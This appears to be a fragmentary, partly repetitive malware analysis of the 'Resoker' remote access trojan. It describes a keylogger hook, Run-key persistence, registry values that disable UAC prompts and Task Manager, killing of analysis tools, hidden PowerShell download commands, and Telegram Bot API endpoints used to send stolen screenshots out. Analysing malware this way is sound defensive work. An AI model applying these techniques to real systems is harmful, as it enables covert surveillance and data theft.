Resoker

Despite being native C++ (MSVC 14.44, Visual Studio 2022), the RAT delegates complex operations like screenshots and file downloads to PowerShell... Screenshots : powershell -WindowStyle Hidden ... File downloads : powershell -WindowStyle Hidden -Command "(New-Object Net.WebClient).DownloadFile(...)"

Execution Flow 1. Execution (resoker.exe) | +-- FreeConsole() -- Hide console window +-- CreateMutexW() -- Global\ResokerSystemMutex (single instance) +-- IsDebuggerPresent() -- Anti-debugging check +-- AdjustTokenPrivileges() -- Acquire SeDebugPrivilege

When the /startup command is issued, Resoker copies itself to a location and adds a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run for automatic execution at user login.

When the /startup command is issued, Resoker copies itself to a location and adds a registry run key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run for automatic execution at user login.

The manifest requests asInvoker execution level, meaning it does not auto-elevate and must use the /elevate command to request administrator privileges via UAC... /uac_min Disable UAC prompts Registry: ConsentPromptBehaviorAdmin=0, PromptOnSecureDesktop=0

FreeConsole() -- Hide console window ... RegisterClassW and CreateWindowExW create the hidden message window (class name: ResokerHiddenClass) needed for the keyboard hook's message pump.

+-- IsDebuggerPresent() -- Anti-debugging check ... The IsDebuggerPresent check is the most elementary anti-debugging technique available and is bypassed by virtually every analysis environment.

[Thread 1] Keylogger | +-- SetWindowsHookExW() -- Low-level keyboard hook | +-- GetAsyncKeyState() -- Backup polling | +-- Output: resoker.log -- Timestamped keystroke log

CreateToolhelp32Snapshot/Process32FirstW/Process32NextW enables the RAT to find and kill analysis tools.

+-- IsDebuggerPresent() -- Anti-debugging check ... The IsDebuggerPresent check is the most elementary anti-debugging technique available and is bypassed by virtually every analysis environment.

[Thread 1] Keylogger | +-- SetWindowsHookExW() -- Low-level keyboard hook | +-- GetAsyncKeyState() -- Backup polling | +-- Output: resoker.log -- Timestamped keystroke log

Command Set Command Function Implementation /screenshot Capture full screen PowerShell: System.Windows.Forms screenshot, sent via /sendPhoto

Resoker uses the Telegram Bot API exclusively for command and control... WININET.dll ... InternetOpenA, InternetOpenUrlA, InternetReadFile ... handle all HTTP communication with the Telegram Bot API.

The Telegram Bot API communication follows a straightforward pattern: ... Polling : HTTP GET to https://api.telegram.org/bot<TOKEN>/getUpdates?offset=<N>&timeout=5 ... Text response : POST to /sendMessage ... File upload : POST to /sendPhoto

Command Set ... /screenshot Capture full screen ... sent via /sendPhoto ... Text response : POST to /sendMessage with chat_id and parse_mode=HTML File upload : POST to /sendPhoto with multipart form data

Command dispatch -- /screenshot, /download, /block_taskmgr, etc. +-- Process killing -- taskmgr.exe, procexp.exe, ProcessHacker.exe ... /block_taskmgr Disable Task Manager Registry: DisableTaskMgr = 1